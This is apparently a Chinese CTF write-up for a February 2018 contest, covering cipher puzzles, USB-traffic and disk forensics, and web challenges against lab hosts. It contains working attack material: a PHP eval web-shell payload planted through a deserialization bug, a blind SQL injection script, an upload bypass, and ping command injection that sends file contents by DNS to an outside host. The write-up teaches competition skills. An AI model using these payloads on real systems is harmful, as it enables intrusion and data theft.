2018二月安恒月赛WRITE UP

二月安恒月赛WRITE UP

CRYPTO

凯撒?替换?呵呵!

题目说明:

MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZO
HIXOEOWMEHZO}

answer:这题可以秒解,因为flag格式是flag{},所以MTHJ应该替换成flag。

掏出杀器替换网站quipquip

2018二月安恒月赛WRITE UP_第1张图片

真的是秒解,遗憾没打这比赛,一分钟不到就拿一血是怎样一种体验233333允许我小小的yy一下(羞

 

Cipher

题目说明:

还能提示什么呢?公平的玩吧(密钥自己找) Dncnoqqfliqrpgeklwmppu

answer:密钥自己找?看了一下是不是一月安恒的培根的坑,发现大写的字母就第一个,可能并不是培根。

然后其实题目还是给出了提示:“公平”  ,公平的英文是fair,联想到经典密码:playfair密码

原理请见:

https://zh.wikipedia.org/wiki/%E6%B3%A2%E9%9B%B7%E8%B2%BB%E5%AF%86%E7%A2%BC

然而还是不知道密钥是啥,这就很烦了,试试playfairexample作为密码,然后并不能得出flag,一般密码题,flag应该是有意义的句子。

好吧,实在是想不到,看wp才知道密钥是playfair。(好坑)

解密得flag.

根据算法,得到: itisnotaproblemhavefun
flag{itisnotaproblemhavefun}

 

MISC

感谢榕榕姐姐给我发的misc题目QWQ。

USB

首先拿到一个压缩包,里面两个文件,一个233.rar压缩包和一个key.ftm.

没什么想法,用winrar打开233.rar,发现一个报错。

2018二月安恒月赛WRITE UP_第2张图片

png的文件头被破坏,那么就要修复一下了。用winhex打开233.rar。修复png。

这里科普一下rar的文件结构:

https://wenku.baidu.com/view/b7889b64783e0912a2162aa4.html

我们看到文件头的头类型必须是0x74。然后原233.rar文件结构中是7A。那么就修复一下。

2018二月安恒月赛WRITE UP_第3张图片

2018二月安恒月赛WRITE UP_第4张图片

然后就能打开233.png了。

没什么想法,放stegsolve上过一遍,发现在蓝色通道的0层处有二维码。扫一下二维码得到

ci{v3erf_0tygidv2_fc0}

然后栅栏加凯撒?不是还有一个key.ftm文件还没动吗?

对key.ftm用USB Monitor Pro打开ftm文件,发现第51行有一个压缩包。

进行binwalk分析,发现有一个key.pcap流量包。

2018二月安恒月赛WRITE UP_第5张图片

提取出来,发现是USB流量包经典题型。直接拿脚本跑。

这里附上USB流量包和鼠标流量包的分析链接:

http://blog.csdn.net/qq_36609913/article/details/78578406

脚本跑一下,拿到KEY{XINAN}

既然有key的话就能想到维吉尼亚密码。

找一个在线网站:

http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx

得到:fa{i3eei_0llgvgn2_sc0}

然后明显是栅栏解密了。

22个字符,明显11个一栏。解密得flag。

 flag{vig3ne2e_is_c00l}

溯源

拿到文件之后,用file命令分析

file secret

发现是一个镜像文件。使用mount命令挂载一下。

先创建一个1文件夹。

mount secret ./1

打开文件发现see_it,显示后门已经删除。

2018二月安恒月赛WRITE UP_第6张图片

那么使用extundelete命令恢复磁盘文件。首先先看一下原本有些什么文件。(如果不会用extundelete可以先extundelete --help)

extundelete secret --inode 2

可以看到
2018二月安恒月赛WRITE UP_第7张图片
不管了全部恢复

 extundelete secret --restore-all

把hack.chm拿出来,用hh.exe打开分析。

hh -decompile hack hack.chm

然后在hack文件夹下的xep.htm里面找到这样的信息。

2018二月安恒月赛WRITE UP_第8张图片

好,访问

http://192.168.5.48/C_0uT.php

额额,发现并没有什么东西,后来发现是个bug,是小写t。

实际是

http://192.168.5.48/C_0ut.php?data=hello

然后思路全无。。。。。没事用nmap扫一波。

2018二月安恒月赛WRITE UP_第9张图片

看到一波端口。

访问一下8080端口。

2018二月安恒月赛WRITE UP_第10张图片

发现一波代码审计(woc!这不是misc吗?)

好吧,利用反序列化漏洞,文件上传,getshell。

测试:

http://192.168.5.42/C_0ut.php?data=%3C?php%20eval($_GET[%27a%27]);?%3E

看到源代码已经写入改信息。

然后利用反序列化利用漏洞。

2018二月安恒月赛WRITE UP_第11张图片

O:9:"copy_file":3:{s:4:"path";s:7:"upload/";s:4:"file";s:10:"yulige.php";s:3:"url";s:67:"http://127.0.0.1/C_0ut.php?data=%3C?php%20eval($_GET[%27a%27]);?%3E";}

然后利用data传入。

http://192.168.5.42:8080/?data=O%3A9%3A%22copy_file%22%3A3%3A%7Bs%3A4%3A%22path%22%3Bs%3A7%3A%22upload%2f%22%3Bs%3A4%3A%22file%22%3Bs%3A10%3A%22yulige.php%22%3Bs%3A3%3A%22url%22%3Bs%3A67%3A%22http%3A%2f%2f127.0.0.1%2fC_0ut.php%3Fdata%3D%253C%3Fphp%2520eval%28%24_GET%5B%2527a%2527%5D%29%3B%3F%253E%22%3B%7D

2018二月安恒月赛WRITE UP_第12张图片

说明已经上传成功,yulige.php下密码是a。

测试:

2018二月安恒月赛WRITE UP_第13张图片

发现shell正常,列一下文件。

2018二月安恒月赛WRITE UP_第14张图片

然后读取

2018二月安恒月赛WRITE UP_第15张图片

 

WEB

终于到WEB了233333

进击的盲注

掏出御剑扫目录日常。发现robots.txt。

发现有index.txt。访问发现源码泄露。

 



乌云后台登录





 







		


代码审计咯,首先有关键语句:

 @$con = mysql_connect("localhost","root","c2FkZmFnZGZkc3Nm");

用户名是root,密码是c2FkZmFnZGZkc3Nm,使用的是本地登陆localhost。

function waf($id) { if(preg_match("/\(|\)|\\\\/", $id)) return True; else return False; }

发现waf掉了()/三个符号,然后看看连接语句是:

$sql="SELECT * FROM admin WHERE username='".$username."'" ;

这就是注入点了。

我们使用order by注入。

' or 1 union select 1,2,'%s' order by 3#

用以上payload进行盲注。

然后发现GG,没有什么luan用,因为order对大小写不敏感。这里考了一下binary的使用。

使用binary的话可以识别大小写。贴一下盲注的脚本:

#!/usr/bin/env python
# encoding: utf-8
import requests
import string
url = "192.168.5.62/index.php"
flag = ""
for i in range(1,1270):
    payload = flag
    for j in "0123456789"+string.letters+"!@#$^&*()==":
        data = {
                "username":"admin' and password like binary 'dVAxMEBkX25Fdy5waHA%s%%'#"%(payload+j),
                "password":"123"
        }
        print data
        r = requests.post(url=url,data=data)
        if "password error" in r.content:
            flag += j
            print flag
            break

膜拜一叶飘零师傅。

跑出来uP10@d_nEw.php的base64字符串。

进入发现是文件上传。

http://192.168.5.62/uP10@d_nEw.php

2018二月安恒月赛WRITE UP_第16张图片

发现其实上传可以成功的,但是如果不是图片格式,会被删除。

方法一:条件竞争。一边上传我们的带马的php文件一边访问上传的网页。

直到返回200,说明已经上传成功。然后,拿一句话获得flag即可。

方法二:xishir师傅的思路(膜一发xishir)

使用.php;.jpg的后缀的php文件即可拿shell。

PING

打开什么都没有,日常掏出大宝剑(御剑)扫目录。发现又是robots.txt

User-agent: *
Disallow: 
Disallow: index.txt
Disallow: where_is_flag.php

访问index.txt

echo "ping";
$ip = (string)$_GET['ping'];
$ip = str_replace(">", "0.0", $ip);
system("ping " . $ip);

就发现过滤了">",既然是ping,刚好上次moctf新春欢乐赛看到一题ping。

其实差不多的解法,都是利用DNS带出。(盲打RCE)

http://192.168.5.49/?ping=`cat where_is_flag.php|sed s/[[:space:]]//g`.yulige.ceye.io

s/[[:space:]]//g  是因为域名里面是不能有空格的,这里把空格过滤。

盲打RCE细讲请看一叶飘零师傅的文章(再膜一下)。

http://skysec.top/2017/12/29/Time-Based-RCE/

2018二月安恒月赛WRITE UP_第17张图片

读flag。

http://192.168.5.49/?ping=`cat dgfsdunsadkjgdgdfhdfhfgdhsadf/flag.php|sed s/[[:space:]]//g`.yulige.ceye.io

2018二月安恒月赛WRITE UP_第18张图片

看到flag成功带出。

应该不是XSS

打开题目一看,是个留言板

F12代码审计。

2018二月安恒月赛WRITE UP_第19张图片

发现main.js.

$(function () {

    $.getToken = function () {
        return $("token").text();
    }
    
    var panel = ['feedback','login','main','chgpass'];
    var token = $.getToken();
    
    function getPage(){
    	var page = document.location.hash.slice(1).split('-')[0];
    	if(panel.indexOf(page) > -1){
    		return page;
    	}
    	return panel[0];
    }
    
    function loadPage(page){
    	page = page + '.html';
    	$.get( "./template/"+page, function(data) {
		$("#frame").html(data);
	})
	.fail(function() {
		alert( "杞藉叆妯℃澘澶辫触" );
	});
    }
    
    function main(){
	page = getPage();
	loadPage(page);
    }
    
    window.onhashchange = function(){
    	 main();
    }
    
    main();
});

看到是动态载入其他页面。大致意思是用#可以访问其他页面,访问 /#login是登录的界面,/#chgpass是修改密码的界面,其中修改密码的时候不需要输入原密码,看到这里明白大概其是个csrf。

而访问#main的时候发现flag{}里面是空的,说明可能没有权限加载,所以用csrf获取管理员权限。

审计app.js

2018二月安恒月赛WRITE UP_第20张图片

发现是个修改密码的js,但是会先验证token,所以我们需要先得到token。

然而token就在源代码里面

2018二月安恒月赛WRITE UP_第21张图片

获取token的方法原理:

https://githubengineering.com/githubs-post-csp-journey/

方法一:CSRF

2018二月安恒月赛WRITE UP_第22张图片

因为后面需要vps,我懒的弄了,直接看大佬的操作。

长图来源链接:

http://www.mamicode.com/info-detail-2214325.html

方法二:XSS

附上大佬的解题思路:

http://forum.91ctf.com/index.php/group/topic/id-37

你可能感兴趣的:(CTF-WRITE-UP)